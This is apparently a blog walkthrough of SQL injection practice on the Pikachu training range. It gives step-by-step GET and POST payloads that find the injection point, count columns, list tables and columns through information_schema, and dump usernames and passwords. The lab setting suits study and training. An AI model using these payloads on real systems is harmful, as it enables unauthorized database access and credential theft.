Pikachu shooting range - character-type and numeric-type SQL injection practice

Table of contents

1. Character type (GET)

1. Judging the parameter passing method and the injection point

2. Judging the number of columns

3. Determining the database name

4. Looking up the table names

5. Looking up the field names

6. Getting the data

2. Numeric type (POST)

1. Judging the parameter passing method and the injection point

2. Judging the number of columns

3. Getting the database name

4. Checking the table names

5. Checking the field names

6. Getting the data

1. Character type (GET)

1. Judging the parameter passing method and the injection point

On entering the range you see a single input box, so the first job is to work out how the parameter is passed and what kind of injection point it is. Entering 1' in the box produces a database error, and the submitted value shows up in the URL, so the parameter is passed with GET.


Enter the following directly in the URL bar; taken together they show a character-type injection point:

1' #error reported

1'and'1'='1 #no error reported

1'and'1'='2 #no error reported

The lone quote leaves the string literal in the query unterminated, which is the error. The other two payloads close the literal themselves and end with an opening quote that pairs with the query's own trailing quote, so they parse cleanly. The parameter is therefore spliced into a quoted string, which is a character-type SQL injection vulnerability.

2. Judging the number of columns

Probe the width of the SELECT list with ORDER BY: ordering by the third column raises an error, so the query returns exactly two columns, and every UNION payload below must also select two. Note that --+ is used as the comment terminator here because a raw # typed in the URL bar is treated by the browser as a fragment and never reaches the server, while the + decodes to the space MySQL requires after --.

1' order by 1,2,3 --+

3. Determining the database name

A UNION that puts database() into the second column echoes the current database name, pikachu:

1' union select 1,database() --+

4. Looking up the table names

There may be more than one table, so the aggregate function group_concat() collapses every table name in the current database into a single row that fits the one display column:

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

5. Looking up the field names

The same trick against information_schema.columns lists the fields of the users table. Adding table_schema=database() to the WHERE clause is a sensible extra restriction, since a table called users in another database would otherwise mix its columns into the result.

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+

6. Getting the data

Both displayed columns are now under the attacker's control, so the username and password fields of users are read out directly:

1' union select username,password from users --+

2. Numeric type (POST)

1. Judging the parameter passing method and the injection point

After submitting the form, nothing appears in the URL, so the parameter is passed with POST. Capturing the request in Burp Suite shows the body id=&submit=, and id is the injection point. Sending the request to HackBar and entering the test statements shows that this is a numeric-type SQL injection vulnerability: the id value is spliced into the query unquoted, so no quote has to be broken out of.


2. Judging the number of columns

Submitting the following makes order by 3 fail, which shows the query returns only two columns. In a POST body the # comment arrives at the server intact, unlike in a URL, so it can be used as the terminator here:

id=1 order by 3 #


3. Getting the database name

id=1 union select 1,database() #

4. Checking the table names

There may be more than one table, so group_concat() is used again to collapse all table names of the current database into one row:

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

5. Checking the field names

id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' #

6. Getting the data

id=1 union select password,username from users #


Origin blog.csdn.net/qq_60503432/article/details/129932563